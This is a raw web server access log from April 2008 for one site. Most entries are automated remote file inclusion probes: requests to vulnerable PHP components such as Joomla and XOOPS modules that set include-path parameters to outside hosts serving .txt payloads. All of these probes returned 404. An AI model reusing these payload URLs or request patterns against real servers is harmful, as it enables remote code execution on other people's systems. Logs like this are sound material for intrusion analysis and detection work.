211.21.48.203 - - [08/Apr/2008:09:00:01 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:09:00:34 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:09:00:34 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:09:00:35 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:09:00:48 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:09:00:49 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:09:00:49 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:09:00:54 -0700] "GET /logs/access_080216.log//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.179.62.190 - - [08/Apr/2008:09:01:03 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ministryofentrepreneurship.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:09:01:15 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:09:01:16 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:09:01:19 -0700] "GET /logs/access_080126.log//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:09:01:19 -0700] "GET //tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:09:01:20 -0700] "GET /logs//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:01:36 -0700] "GET /logs/access_080329.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.3 - - [08/Apr/2008:09:01:39 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/finkel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.102 - - [08/Apr/2008:09:01:50 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 622413 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.95.82.113 - - [08/Apr/2008:09:02:06 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.hbakc.org/templates/gallery2.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.95.82.113 - - [08/Apr/2008:09:02:06 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.hbakc.org/templates/gallery2.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
195.179.62.190 - - [08/Apr/2008:09:02:06 -0700] "GET /logs/access_071227.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ministryofentrepreneurship.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.179.62.190 - - [08/Apr/2008:09:02:07 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ministryofentrepreneurship.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.179.62.190 - - [08/Apr/2008:09:02:07 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ministryofentrepreneurship.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.100.6.58 - - [08/Apr/2008:09:02:20 -0700] "GET /logs/access_080117.log/index1.php?page=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.48.204.130 - - [08/Apr/2008:09:02:48 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.179.62.190 - - [08/Apr/2008:09:04:30 -0700] "GET /logs/access_080131.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ministryofentrepreneurship.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:04:47 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:04:52 -0700] "GET /senetman/html/index.php?page=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:04:53 -0700] "GET /logs/senetman/html/index.php?page=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
129.241.104.186 - "" [08/Apr/2008:09:05:16 -0700] "GET /bikes/ HTTP/1.1" 200 2320 "-" "boitho.com-dc/0.85 ( http://www.boitho.com/dcbot.html )" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:05:18 -0700] "GET /logs/access_080118.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:05:18 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:09:05:22 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:09:05:24 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:05:25 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.241.251.88 - - [08/Apr/2008:09:05:26 -0700] "GET /logs/access.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.251.88 - - [08/Apr/2008:09:05:27 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:09:05:27 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.251.88 - - [08/Apr/2008:09:05:27 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:09:05:33 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:09:06:02 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:09:06:14 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:06:34 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [08/Apr/2008:09:06:53 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pingstlse.mine.nu//images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [08/Apr/2008:09:06:53 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pingstlse.mine.nu//images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:09:06:55 -0700] "GET /logs/access_080218.log/http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:09:06:55 -0700] "GET /http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:09:06:55 -0700] "GET /logs/http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.8.232.250 - - [08/Apr/2008:09:07:10 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.dmulk.com"
194.79.75.195 - - [08/Apr/2008:09:07:13 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pingstlse.mine.nu//images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:09:08:12 -0700] "GET /logs/access_080130.log/http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.102 - - [08/Apr/2008:09:08:20 -0700] "GET /logs/access_080126.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.53.24.188 - - [08/Apr/2008:09:08:36 -0700] "GET /logs/access_080225.log/index2.php?pagina=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.24.188 - - [08/Apr/2008:09:08:36 -0700] "GET /index2.php?pagina=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.24.188 - - [08/Apr/2008:09:08:36 -0700] "GET /logs/index2.php?pagina=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:09:08:36 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:09:08:43 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:09:09:22 -0700] "GET /http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:09:10:13 -0700] "GET /logs/access_080216.log//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:10:31 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:10:32 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:10:32 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:10:32 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:10:47 -0700] "GET /logs/access_080308.log/senetman/html/index.php?page=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.8.232.250 - - [08/Apr/2008:09:11:01 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.dmulk.com"
68.8.232.250 - - [08/Apr/2008:09:11:01 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:11:02 -0700] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:11:46 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:11:46 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:11:47 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:11:55 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:12:00 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:12:01 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:12:01 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:12:21 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:12:30 -0700] "GET /logs/access_080329.log//modules/agendax/addevent.inc.php?agendax_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:12:33 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:09:12:37 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:13:23 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:13:24 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:13:24 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.192.224 - - [08/Apr/2008:09:13:29 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:13:54 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:13:56 -0700] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:14:00 -0700] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:09:14:05 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.7.82 - - [08/Apr/2008:09:14:20 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/h4dy/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.7.82 - - [08/Apr/2008:09:14:20 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/h4dy/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:14:22 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:14:32 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
70.84.7.82 - - [08/Apr/2008:09:14:43 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/h4dy/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:09:14:52 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:09:15:01 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:15:03 -0700] "GET /logs/access_080112.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:15:09 -0700] "GET /logs/access_080313.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:15:20 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:09:15:21 -0700] "GET /(chimot)http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:09:15:21 -0700] "GET /logs/(chimot)http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:15:24 -0700] "GET /logs/access_080120.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:15:56 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:16:10 -0700] "GET /logs/access_080112.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:16:20 -0700] "GET /logs/access_080313.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:16:33 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:16:40 -0700] "GET /logs/access_080120.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:16:42 -0700] "GET /logs/access_080329.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:16:43 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:16:43 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:16:44 -0700] "GET /logs/access_071220.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
77.221.130.3 - - [08/Apr/2008:09:16:48 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/finkel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [08/Apr/2008:09:16:48 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/finkel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [08/Apr/2008:09:17:06 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/finkel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:09:17:17 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:17:24 -0700] "GET /logs/access_080106.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.65.76.195 - - [08/Apr/2008:09:18:09 -0700] "GET /logs/access_080329.log/joomla/index.php?option=com_restaurante&task=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.91.249.193 - - [08/Apr/2008:09:18:29 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [08/Apr/2008:09:18:30 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [08/Apr/2008:09:18:30 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.18.192.224 - - [08/Apr/2008:09:19:02 -0700] "GET /logs/access_080126.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
